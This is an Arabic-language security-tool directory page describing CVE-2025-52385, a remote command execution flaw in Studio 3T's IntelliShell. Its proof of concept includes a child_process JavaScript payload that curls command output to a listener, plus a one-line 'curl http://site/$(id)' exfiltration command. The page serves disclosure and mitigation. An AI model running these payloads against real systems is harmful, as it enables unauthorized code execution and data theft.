Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-52385 — Studio 3T الإصدار 2025.1.0 | Kitploit
أدوات/GitHubGitHub/kov404/cve-2025-52385
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubkov404/cve-2025-52385

CVE-2025-52385

Studio 3T الإصدار 2025.1.0

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-52385

البرنامج: Studio 3T v.2025.1.0

تقرير الثغرة: تنفيذ أوامر عن بُعد في Studio 3T

نظرة عامة ثغرة حرجة في Studio 3T الإصدار 2025.1.0 والأقدم تتيح لمهاجم عن بُعد تنفيذ تعليمات برمجية عشوائية عبر حمولة مصممة بعناية تستغل وحدة child_process في مكوّن IntelliShell.

التفاصيل نوع الثغرة: تنفيذ أوامر عن بُعد المنتج المتأثر: Studio 3T، الإصدار <= 2025.1.0 المكوّن المتأثر: IntelliShell نوع الهجوم: عن بُعد التأثيرات: تنفيذ التعليمات البرمجية: نعم رفض الخدمة: نعم تصعيد الامتيازات: نعم

الوصف تمكّن هذه الثغرة مهاجمًا عن بُعد من تنفيذ أوامر نظام تشغيل عشوائية عن طريق إرسال حمولة JavaScript خبيثة عبر IntelliShell، مستغلاً وحدة child_process. تُعد هذه ثغرة تنفيذ أعمى، أي أنه لا يتم إرجاع أي مخرجات مباشرة إلى المهاجم. متجه الهجوم

إنشاء اتصال بمثيل MongoDB. إرسال حمولة JavaScript خبيثة عبر IntelliShell تستخدم وحدة child_process لتنفيذ أوامر نظام تشغيل عشوائية.

إثبات المفهوم للتحقق من الثغرة، اتبع الخطوات التالية:

قم بإعداد خادم HTTP محلي:

root@kitploit:~
python3 -m http.server 80

نفّذ حمولة JavaScript التالية في IntelliShell:

root@kitploit:~
const {exec} = require('child_process');
exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));

بدلاً من ذلك، استخدم الأمر التالي كمتجه للتحقق:

root@kitploit:~
curl http://site/$(id)

المراجع

  • الموقع الرسمي لـ Studio 3T
  • مستودع Studio 3T على GitHub
  • CWE-78: حقن أوامر نظام التشغيل
  • CWE-94: حقن التعليمات البرمجية

التخفيف المستخدمون: قم بالترقية إلى إصدار مصحح من Studio 3T (إن توفر) أو تجنب استخدام IntelliShell مع اتصالات MongoDB غير الموثوقة. البائعون: قيّدوا أو عقمّوا المدخلات إلى وحدة child_process في IntelliShell لمنع تنفيذ الأوامر غير المصرح به.

تنزيل الأداة

شكر وتقدير تم اكتشاف هذه الثغرة والإبلاغ عنها بواسطة Kaio Mendonca Pereira.